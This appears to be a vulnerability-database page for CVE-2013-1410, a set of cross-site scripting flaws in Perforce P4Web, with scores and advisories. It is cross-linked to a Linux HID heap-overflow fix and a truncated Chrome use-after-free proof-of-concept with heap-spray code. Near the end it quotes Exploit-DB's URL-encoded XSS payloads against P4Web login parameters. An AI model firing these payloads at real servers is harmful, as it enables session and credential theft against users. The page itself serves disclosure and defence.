CVE-2013-1410
published 2020-02-12CVE-2013-1410: Perforce P4web 2011.1 and 2012.1 has multiple XSS vulnerabilities
PriorityP433medium6.1CVSS 3.1
AVNACLPRNUIRSCCLILAN
EXPLOIT
EPSS
1.50%
71.1th percentile
Perforce P4web 2011.1 and 2012.1 has multiple XSS vulnerabilities
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| perforce | p4web | — | — |
| perforce | p4web | — | — |
CVSS provenance
nvdv3.16.1MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-g4q3-pw4q-377x: Perforce P4web 2011
ghsa_unreviewed·2022-05-05
CVE-2013-1410 [MEDIUM] GHSA-g4q3-pw4q-377x: Perforce P4web 2011
Perforce P4web 2011.1 and 2012.1 has multiple XSS vulnerabilities
Kernel
HID: steelseries: validate output report details
kernel_security·2013-09-11·CVSS 4.7
CVE-2013-2891 [MEDIUM] HID: steelseries: validate output report details
HID: steelseries: validate output report details
A HID device could send a malicious output report that would cause the
steelseries HID driver to write beyond the output report allocation
during initialization, causing a heap overflow:
[ 167.981534] usb 1-1: New USB device found, idVendor=1038, idProduct=1410
...
[ 182.050547] BUG kmalloc-256 (Tainted: G W ): Redzone overwritten
CVE-2013-2891
Signed-off-by: Kees Cook
Cc: [email protected]
Reviewed-by: Benjamin Tissoires
Signed-off-by: Jiri Kosina
No detection rules found.
Exploit-DB
Google Chrome 26.0.1410.43 (Webkit) - OBJECT Element Use-After-Free (PoC)
exploitdb·2013-04-04
CVE-2013-2842 Google Chrome 26.0.1410.43 (Webkit) - OBJECT Element Use-After-Free (PoC)
Google Chrome 26.0.1410.43 (Webkit) - OBJECT Element Use-After-Free (PoC)
---
#---object-beforeload-chrome.html---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------#
function sprayOne(mem, size, v) {
var a = new Uint8ClampedArray(size - 20);
for (var j = 0; j 155 LayoutRect contentBoxRect() const { return LayoutRect(borderLeft() + paddingLeft(), borderTop() + paddingTop(), contentWidth(), contentHeight()); }
156 // The content box in absolute coords. Ignores transforms.
157 IntRect absoluteContentBox() const;
158 // The content box converted to absolute coords (taking transforms into account).
(lldb) reg read
General Purpose Registers:
ea
Exploit-DB
Perforce P4Web - Multiple Cross-Site Scripting Vulnerabilities
exploitdb·2013-01-22
CVE-2013-1410 Perforce P4Web - Multiple Cross-Site Scripting Vulnerabilities
Perforce P4Web - Multiple Cross-Site Scripting Vulnerabilities
---
source: https://www.securityfocus.com/bid/57514/info
Perforce P4Web is prone to multiple cross site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Perforce P4Web versions 2011.1 and 2012.1 are vulnerable; other versions may also be affected.
http://www.example.com/u=Administrator&p=&c=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Submit=Log+In&orgurl=
http://www.example.com/cnm=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%2
No writeups or analysis indexed.
2020-02-12
Published